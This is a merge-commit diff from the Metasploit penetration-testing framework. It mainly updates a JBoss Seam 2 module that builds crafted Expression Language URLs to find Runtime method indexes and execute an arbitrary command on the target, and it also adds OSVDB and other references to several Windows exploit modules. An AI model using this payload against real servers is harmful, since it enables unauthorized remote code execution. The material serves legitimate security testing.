Merge branch 'master' of https://github.com/rapid7/metasploit-framework

modules/auxiliary/admin/http/jboss_seam_exec.rb

@@ -18,12 +18,17 @@ class Metasploit3 < Msf::Auxiliary
 					JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform
 				4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression
 				Language (EL) expressions, which allows remote attackers to execute arbitrary code
-				via a crafted URL.
+				via a crafted URL. This modules also has been tested successfully against IBM
+				WebSphere 6.1 running on iSeries.
 
 				NOTE: this is only a vulnerability when the Java Security Manager is not properly
 				configured.
 			},
-			'Author'          => [ 'guerrino di massa' ],
+			'Author'          =>
+				[
+					'guerrino di massa', # Metasploit module
+					'Cristiano Maruti <cmaruti[at]gmail.com>' # Support for IBM Websphere 6.1
+				],
 			'License'         => MSF_LICENSE,
 			'References'      =>
 				[
@@ -36,27 +41,25 @@ class Metasploit3 < Msf::Auxiliary
 		register_options(
 			[
 				Opt::RPORT(8080),
-				OptString.new('JBOSS_ROOT',[ true, 'JBoss root directory', '/']),
+				OptString.new('TARGETURI', [ true, 'Target URI', '/seam-booking/home.seam']),
 				OptString.new('CMD', [ true, "The command to execute."])
 			], self.class)
 	end
 
 	def run
-		jbr = normalize_uri(datastore['JBOSS_ROOT'])
+		uri = normalize_uri(target_uri.to_s)
 		cmd_enc = ""
 		cmd_enc << Rex::Text.uri_encode(datastore["CMD"])
 
-		flag_found_one = 0
-		flag_found_two = 0
+		flag_found_one = 255
+		flag_found_two = 255
 
-		uri_part_1 = "seam-booking/home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()["
+		uri_part_1 = "?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()["
 		uri_part_2 = "].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()["
 		uri_part_3 = "].invoke(null),'"
 
-		print_status("Finding getDeclaredMethods() indexes... (0 to 24)")
-
 		25.times do |index|
-			req = jbr + uri_part_1 + index.to_s + "]}"
+			req = uri + uri_part_1 + index.to_s + "]}"
 
 			res = send_request_cgi(
 				{
@@ -66,20 +69,20 @@ class Metasploit3 < Msf::Auxiliary
 
 			if (res.headers['Location'] =~ %r(java.lang.Runtime.exec\%28java.lang.String\%29))
 				flag_found_one = index
-				print_status("Found right index at [" + index.to_s + "]")
+				print_status("Found right index at [" + index.to_s + "] - exec")
 			elsif (res.headers['Location'] =~ %r(java.lang.Runtime\+java.lang.Runtime.getRuntime))
-				print_status("Found right index at [" + index.to_s + "]")
+				print_status("Found right index at [" + index.to_s + "] - getRuntime")
 				flag_found_two = index
 			else
 				print_status("Index [" + index.to_s + "]")
 			end
 		end
 
-		if (flag_found_one > 0 && flag_found_two > 0 )
+		if (flag_found_one != 255 && flag_found_two != 255 )
 			print_status("Target appears VULNERABLE!")
 			print_status("Sending remote command:" + datastore["CMD"])
 
-			req = jbr + uri_part_1 + flag_found_one.to_s + uri_part_2 + flag_found_two.to_s + uri_part_3 + cmd_enc + "')}"
+			req = uri + uri_part_1 + flag_found_one.to_s + uri_part_2 + flag_found_two.to_s + uri_part_3 + cmd_enc + "')}"
 
 			res = send_request_cgi(
 				{

modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb

@@ -36,8 +36,9 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'References'     =>
 				[
-					[ 'CVE', '2011-4786'],
-					[ 'BID', '51396'],
+					[ 'CVE', '2011-4786' ],
+					[ 'OSVDB', '78306' ],
+					[ 'BID', '51396' ],
 					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-013/' ],
 				],
 			'DefaultOptions' =>

modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb

@@ -34,6 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'References'     =>
 				[
+					[ 'OSVDB', '78102' ],
 					[ 'EDB', '15668' ],
 					[ 'URL', 'http://secunia.com/advisories/42445/' ],
 					[ 'URL', 'http://xforce.iss.net/xforce/xfdb/63666' ]

modules/exploits/windows/browser/maxthon_history_xcs.rb

@@ -34,6 +34,8 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'References' =>
 				[
+					['OSVDB', '88191'],
+					['EDB', '23225'],
 					['URL', 'http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html']
 				],
 			'Payload' =>

modules/exploits/windows/browser/mozilla_reduceright.rb

@@ -36,6 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'References'     =>
 				[
 					['CVE', '2011-2371'],
+					['OSVDB', '73184'],
 					['EDB', '17974'],
 					['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=664009']
 				],

modules/exploits/windows/browser/ms11_081_option.rb

@@ -33,6 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'References'     =>
 				[
 					[ 'CVE', '2011-1996' ],
+					[ 'OSVDB', '76208' ],
 					[ 'MSB', 'MS11-081' ],
 					[ 'URL', 'http://ifsec.blogspot.com/2011/10/internet-explorer-option-element-remote.html' ],
 					[ 'URL', 'http://pastebin.com/YLH725Aj' ]

modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb

@@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'References'     =>
 				[
 					[ 'CVE', '2013-0025' ],
+					[ 'OSVDB', '90122' ],
 					[ 'MSB', 'MS13-009' ],
 					[ 'URL', 'http://security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf' ]
 				],

modules/exploits/windows/browser/pcvue_func.rb

@@ -29,9 +29,10 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'References'     =>
 				[
-					[ 'CVE', '2008-4915'],
-					[ 'BID', '49795'],
-					[ 'URL', 'http://aluigi.altervista.org/adv/pcvue_1-adv.txt'],
+					[ 'CVE', '2011-4044' ],
+					[ 'OSVDB', '77561' ],
+					[ 'BID', '49795' ],
+					[ 'URL', 'http://aluigi.altervista.org/adv/pcvue_1-adv.txt' ]
 				],
 			'DefaultOptions' =>
 				{

modules/exploits/windows/ftp/aasync_list_reply.rb

@@ -25,7 +25,9 @@ class Metasploit3 < Msf::Exploit::Remote
 			'License'        => MSF_LICENSE,
 			'References'     =>
 				[
-					[ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ],
+					[ 'OSVDB', '68701' ],
+					[ 'EDB', '16738' ],
+					[ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ]
 				],
 			'DefaultOptions' =>
 				{

modules/exploits/windows/http/ektron_xslt_exec.rb

@@ -33,6 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'References'     =>
 				[
 					[ 'CVE', '2012-5357'],
+					[ 'OSVDB', '88107' ],
 					[ 'URL', 'http://webstersprodigy.net/2012/10/25/cve-2012-5357cve-1012-5358-cool-ektron-xslt-rce-bugs/' ],
 					[ 'URL', 'http://technet.microsoft.com/en-us/security/msvr/msvr12-016' ]
 				],

modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb

@@ -31,6 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'References' =>
 				[
 					['CVE', '2011-0266'],
+					['OSVDB', '70473'],
 					['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-008/']
 				],
 			'Payload'	 =>

modules/exploits/windows/http/osb_uname_jlist.rb

@@ -27,8 +27,9 @@ class Metasploit3 < Msf::Exploit::Remote
 			'License'        => MSF_LICENSE,
 			'References'     =>
 				[
-					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-118' ],
 					[ 'CVE', '2010-0904' ],
+					[ 'OSVDB', '66338' ],
+					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-118' ]
 					# the jlist vector has not been disclosed or has it?
 				],
 			'Targets'	=>

modules/exploits/windows/misc/allmediaserver_bof.rb

@@ -34,6 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'References'     =>
 				[
+					[ 'OSVDB', '83889' ],
 					[ 'EDB', '19625' ]
 				],
 			'DefaultOptions' =>

modules/exploits/windows/novell/file_reporter_fsfui_upload.rb

@@ -31,6 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'References'     =>
 				[
 					[ 'CVE', '2012-4959'],
+					[ 'OSVDB', '87573' ],
 					[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959' ]
 				],
 			'Payload'        =>